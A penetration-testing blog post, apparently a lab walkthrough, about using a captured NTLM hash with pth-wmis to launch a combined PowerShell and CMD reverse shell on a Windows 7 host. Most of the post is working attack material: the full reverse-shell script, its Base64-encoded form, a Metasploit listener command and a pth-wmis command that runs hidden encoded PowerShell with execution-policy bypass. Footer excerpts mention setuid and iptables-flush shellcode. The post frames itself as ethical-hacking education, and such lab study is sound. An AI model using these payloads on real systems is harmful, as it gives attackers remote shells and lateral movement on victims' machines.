Skip to main content

pth-wmis and Combined PowerShell and CMD Reverse Shell


Useful Background:

http://passing-the-hash.blogspot.ca/2013/04/missing-pth-tools-writeup-wmic-wmis-curl.html
http://passing-the-hash.blogspot.ca/2013/07/WMIS-PowerSploit-Shells.html

Resource:

Combined PowerShell and CMD Reverse Shell

Purpose:

Test the use of the "Combined PowerShell and CMD Reverse Shell" together with the Pass-The-Hash version of wmis (pth-wmis).

Disclaimer:

These scripts are provided for educational purposes only and for use by Ethical Hackers. Use only on systems for which you have acquired all the legally required contracts and permissions for use. It is your responsibility to determine whether you are legally permitted to use these scripts in your country and for your purposes. No warrantee or guarantees are provided.


Attacking Box:

32bit Offsec VM - Kali

Target Box:

Windows 7 Professional Service Pack 1

We Have A Hash

From another compromised box on the same network we have captured the local Administrator's hash:

Administrator:500:NO PASSWORD*********************:DC4BD458EDB0D834A5775F69453F2216:::

Rather than spend excessive time cracking it we are going to use a Pass-The-Hash attack.

Replace the NO PASSWORD**... text with a blank LM Hash:
aad3b435b51404eeaad3b435b51404ee:DC4BD458EDB0D834A5775F69453F2216

Grab The PowerShell Component:

The first thing that we need to do is to grab the PowerShell component from the "Combined PowerShell and CMD Reverse Shell"
$ps=$false;$hostip=(gci -path env:HOSTIP).value;$port=(gci -path env:EXP1).value;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Base64 Encode It: 

The PowerShell not only needs to be Base64 encoded but it also needs to be Unicode encoded first. Personally I like to put what I need encoded into a command.txt file and then use PowerShell to encode it:

$fileName = "command.txt"
$fileContent = get-content $fileName
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText | set-content ($fileName + ".b64")
The result is in a file called command.txt.b64.
Result:
JABwAHMAPQAkAGYAYQBsAHMAZQA7ACQAaABvAHMAdABpAHAAPQAoAGcAYwBpACAALQBwAGEAdABoACAAZQBuAHYAOgBIAE8AUwBUAEkAUAApAC4AdgBhAGwAdQBlADsAJABwAG8AcgB0AD0AKABnAGMAaQAgAC0AcABhAHQAaAAgAGUAbgB2ADoARQBYAFAAMQApAC4AdgBhAGwAdQBlADsAJABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQAaABvAHMAdABpAHAALAAkAHAAbwByAHQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA1ADAAMAAwADAAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAYwBtAGQAPQAoAGcAZQB0AC0AYwBoAGkAbABkAGkAdABlAG0AIABFAG4AdgA6AEMAbwBtAFMAcABlAGMAKQAuAHYAYQBsAHUAZQA7ACQAaQBuAEEAcgByAGEAeQA9ACQAZABhAHQAYQAuAHMAcABsAGkAdAAoACkAOwAkAGkAdABlAG0APQAkAGkAbgBBAHIAcgBhAHkAWwAwAF0AOwBpAGYAKAAoACQAaQB0AGUAbQAgAC0AZQBxACAAJwAkAHAAcwAnACkAIAAtAGEAbgBkACAAKAAkAHAAcwAgAC0AZQBxACAAJABmAGEAbABzAGUAKQApAHsAJABwAHMAPQAkAHQAcgB1AGUAfQBpAGYAKAAkAGkAdABlAG0AIAAtAGwAaQBrAGUAIAAnAD8AOgAnACkAewAkAGkAdABlAG0APQAnAGQAOgAnAH0AJABtAHkAQQByAHIAYQB5AD0AQAAoACcAYwBkACcALAAnAGUAeABpAHQAJwAsACcAZAA6ACcALAAnAHAAdwBkACcALAAnAGwAcwAnACwAJwBwAHMAJwAsACcAcgBtACcALAAnAGMAcAAnACwAJwBtAHYAJwAsACcAYwBhAHQAJwApADsAJABkAG8APQAkAGYAYQBsAHMAZQA7AGYAbwByAGUAYQBjAGgAIAAoACQAaQAgAGkAbgAgACQAbQB5AEEAcgByAGEAeQApAHsAaQBmACgAJABpAHQAZQBtACAALQBlAHEAIAAkAGkAKQB7ACQAZABvAD0AJAB0AHIAdQBlAH0AfQBpAGYAKAAkAGQAbwAgAC0AbwByACAAJABwAHMAKQB7ACQAcwBlAG4AZABiAGEAYwBrAD0AKAAgAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AZQBsAHMAZQB7ACQAZABhAHQAYQAyAD0AJwAvAGMAIAAnACsAJABkAGEAdABhADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKAAgACYAJABjAG0AZAAgACQAZABhAHQAYQAyACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACkAfQA7AGkAZgAoACQAcABzACkAewAkAHAAcgBvAG0AcAB0AD0AJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAfQBlAGwAcwBlAHsAJABwAHIAbwBtAHAAdAA9ACgAcAB3AGQAKQAuAFAAYQB0AGgAfQAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAZABhAHQAYQAgACsAIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAkAHAAcgBvAG0AcAB0ACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

 Set Up A Listener:

export HOSTIP=10.0.0.22;
export EXP1=5379;
msfconsole -q -x "setg LHOST $HOSTIP;use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/x64/shell_reverse_tcp;set EXITFUNC thread;set LPORT $EXP1;exploit -j;";

Run pth-wmis: 

pth-wmis -U "demo/administrator"%"aad3b435b51404eeaad3b435b51404ee:DC4BD458EDB0D834A5775F69453F2216" //10.0.0.20 'cmd.exe /c "set HOSTIP=10.0.0.22 && set EXP1=5379 && powershell -NoP -nol -NonI -W Hidden -Exec Bypass -enc JABwAHMAPQAkAGYAYQBsAHMAZQA7ACQAaABvAHMAdABpAHAAPQAoAGcAYwBpACAALQBwAGEAdABoACAAZQBuAHYAOgBIAE8AUwBUAEkAUAApAC4AdgBhAGwAdQBlADsAJABwAG8AcgB0AD0AKABnAGMAaQAgAC0AcABhAHQAaAAgAGUAbgB2ADoARQBYAFAAMQApAC4AdgBhAGwAdQBlADsAJABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQAaABvAHMAdABpAHAALAAkAHAAbwByAHQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA1ADAAMAAwADAAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAYwBtAGQAPQAoAGcAZQB0AC0AYwBoAGkAbABkAGkAdABlAG0AIABFAG4AdgA6AEMAbwBtAFMAcABlAGMAKQAuAHYAYQBsAHUAZQA7ACQAaQBuAEEAcgByAGEAeQA9ACQAZABhAHQAYQAuAHMAcABsAGkAdAAoACkAOwAkAGkAdABlAG0APQAkAGkAbgBBAHIAcgBhAHkAWwAwAF0AOwBpAGYAKAAoACQAaQB0AGUAbQAgAC0AZQBxACAAJwAkAHAAcwAnACkAIAAtAGEAbgBkACAAKAAkAHAAcwAgAC0AZQBxACAAJABmAGEAbABzAGUAKQApAHsAJABwAHMAPQAkAHQAcgB1AGUAfQBpAGYAKAAkAGkAdABlAG0AIAAtAGwAaQBrAGUAIAAnAD8AOgAnACkAewAkAGkAdABlAG0APQAnAGQAOgAnAH0AJABtAHkAQQByAHIAYQB5AD0AQAAoACcAYwBkACcALAAnAGUAeABpAHQAJwAsACcAZAA6ACcALAAnAHAAdwBkACcALAAnAGwAcwAnACwAJwBwAHMAJwAsACcAcgBtACcALAAnAGMAcAAnACwAJwBtAHYAJwAsACcAYwBhAHQAJwApADsAJABkAG8APQAkAGYAYQBsAHMAZQA7AGYAbwByAGUAYQBjAGgAIAAoACQAaQAgAGkAbgAgACQAbQB5AEEAcgByAGEAeQApAHsAaQBmACgAJABpAHQAZQBtACAALQBlAHEAIAAkAGkAKQB7ACQAZABvAD0AJAB0AHIAdQBlAH0AfQBpAGYAKAAkAGQAbwAgAC0AbwByACAAJABwAHMAKQB7ACQAcwBlAG4AZABiAGEAYwBrAD0AKAAgAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AZQBsAHMAZQB7ACQAZABhAHQAYQAyAD0AJwAvAGMAIAAnACsAJABkAGEAdABhADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKAAgACYAJABjAG0AZAAgACQAZABhAHQAYQAyACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACkAfQA7AGkAZgAoACQAcABzACkAewAkAHAAcgBvAG0AcAB0AD0AJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAfQBlAGwAcwBlAHsAJABwAHIAbwBtAHAAdAA9ACgAcAB3AGQAKQAuAFAAYQB0AGgAfQAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAZABhAHQAYQAgACsAIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAkAHAAcgBvAG0AcAB0ACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"'

Catch A Shell:



Comments

Popular posts from this blog

GIAC GXPN Review – SANS SEC660 (Advanced Penetration Testing, Exploit Writing, and Ethical Hacking)   Intro  SANS is a well respected and premier cyber security training company that employs industry experts as instructors. GIAC is a company that produces testing to validate the skills of security professionals. GIAC exams validate the learning outcomes of the SANS courses. Prerequisites Before attempting this course you should be familiar with penetration testing as this is an advanced course. I would say that you should also be familiar with assembly language and shellcoding. It would be best if you have studied basic stack overflow exploits prior to this course. You will need a basic understanding of programming in C or C++ (preferably both). Scripting using Python would be a useful prerequisite. If you could learn a bit of Ruby scripting it would help for the Metasploit module creation. Be familiar with various routing and networking protocols. Course Coverage This course covers ma

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush  the  selected  chain (all the chains in the table if none i